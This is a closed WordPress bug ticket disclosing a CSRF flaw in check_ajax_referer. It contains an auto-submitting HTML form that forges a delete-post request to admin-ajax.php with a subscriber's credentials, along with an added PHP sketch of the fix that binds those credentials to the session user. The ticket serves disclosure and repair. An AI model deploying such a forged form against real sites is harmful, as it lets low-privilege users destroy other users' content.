Ticket #4939 (closed defect (bug): fixed)

Opened 4 years ago

Last modified 4 years ago

check_ajax_referer does not protect from CSRF at all

Reported by: xknown Owned by: anonymous
Priority: high Milestone: 2.3
Component: Security Version: 2.3
Severity: normal Keywords:
Cc:

Description

check_ajax_referer only checks if the incoming request contains valid user credentials, but wp_get_current_user still uses WP cookies to determine the current user, so anyone with a subscriber role (or another role) can perform CSRF attacks.

<html>
<body>
	<form method="post" action="http://localhost/wp/wp-admin/admin-ajax.php">
		<input type="text" name="action" value="delete-post" />
		<input type="text" name="id" value="Post_ID" />
		<input type="text" name="cookie" value="wordpressuser_sitehash=subscriber; wordpresspass_sitehash=password" />
	</form>
	<script>document.forms[0].submit();</script>
</body>
</html>

Attachments

pluggable.diff (357 bytes) - added by xknown 4 years ago.
Set current user in check_ajax_referer.
4939.diff (977 bytes) - added by mdawaffe 4 years ago.

Change History

xknown 4 years ago

Set current user in check_ajax_referer.

Rather than setting the user, we could check to see if the current user matches the user from the cookie and die('-1') otherwise.

  • Priority changed from normal to high
  • Milestone set to 2.3
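The check proposed above, that the credentials carried in the AJAX request must belong to the same user the request will run as (the cookie-session user that wp_get_current_user resolves), with die('-1') otherwise, as an added PHP illustration. This is not WordPress's code and not the attached patch; the user table, the session cookie name wp_session_user, and every function name here are constructed stand-ins for the real WordPress functions.

```php
<?php
// Added illustration of the binding check proposed in the ticket. Not WordPress
// code: user_table(), session_user() and the wp_session_user cookie are
// hypothetical stand-ins for the real user store, wp_get_current_user() and
// the WordPress auth cookies.

// Constructed user table: login => password hash (built at runtime).
function user_table(): array {
    static $t = null;
    if ($t === null) {
        $t = [
            'admin'      => password_hash('admin-secret', PASSWORD_DEFAULT),
            'subscriber' => password_hash('sub-secret', PASSWORD_DEFAULT),
        ];
    }
    return $t;
}

// Stand-in for wp_get_current_user(): the acting user comes from the browser's
// session cookie. In the CSRF scenario this is the victim, because the victim's
// browser attaches its own cookies to the forged request automatically.
function session_user(array $cookies): ?string {
    $login = $cookies['wp_session_user'] ?? null;   // constructed cookie name
    return ($login !== null && isset(user_table()[$login])) ? $login : null;
}

// Parse the POSTed "cookie" field:
// "wordpressuser_<hash>=<login>; wordpresspass_<hash>=<pass>"
function parse_posted_cookie(string $raw): array {
    $creds = ['login' => null, 'pass' => null];
    foreach (explode(';', $raw) as $pair) {
        $parts = array_map('trim', explode('=', $pair, 2));
        if (count($parts) !== 2) {
            continue;
        }
        [$name, $value] = $parts;
        if (strncmp($name, 'wordpressuser_', 14) === 0) {
            $creds['login'] = urldecode($value);
        } elseif (strncmp($name, 'wordpresspass_', 14) === 0) {
            $creds['pass'] = urldecode($value);
        }
    }
    return $creds;
}

// The flawed shape the ticket describes: any valid credentials pass, no matter
// whose they are. Returns the login the credentials prove, or null.
function posted_credentials_owner(array $post): ?string {
    $c = parse_posted_cookie($post['cookie'] ?? '');
    if ($c['login'] === null || $c['pass'] === null) {
        return null;
    }
    $hash = user_table()[$c['login']] ?? null;
    return ($hash !== null && password_verify($c['pass'], $hash)) ? $c['login'] : null;
}

// Hardened check: the proven identity must equal the session identity, so a
// subscriber cannot supply their own credentials while the request executes
// with an administrator's cookies.
function check_ajax_referer_bound(array $post, array $cookies): bool {
    $proven  = posted_credentials_owner($post);
    $session = session_user($cookies);
    return $proven !== null && $session !== null && hash_equals($session, $proven);
}

// Handler in the shape of admin-ajax.php's delete-post action; the ticket's
// proposed behaviour on mismatch is die('-1'), returned here for readability.
function handle_delete_post(array $post, array $cookies): string {
    if (!check_ajax_referer_bound($post, $cookies)) {
        return '-1';   // a real handler would die('-1')
    }
    return "deleted post {$post['id']} as " . session_user($cookies);
}

// Constructed request in the ticket's scenario: subscriber credentials in the
// form body, administrator cookies on the session.
$post = [
    'action' => 'delete-post',
    'id'     => '42',
    'cookie' => 'wordpressuser_x=subscriber; wordpresspass_x=sub-secret',
];
echo handle_delete_post($post, ['wp_session_user' => 'admin']), PHP_EOL;      // -1
echo handle_delete_post($post, ['wp_session_user' => 'subscriber']), PHP_EOL; // deleted post 42 as subscriber
```

The first call is rejected because the credentials prove "subscriber" while the session is "admin"; the second succeeds only because both identities agree, which is the property the unbound check was missing.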

comment:3 ryan 4 years ago

  • Status changed from new to closed
  • Resolution set to fixed

(In [6138]) Extra protection in check_ajax_referer from mdawaffe. fixes #4939
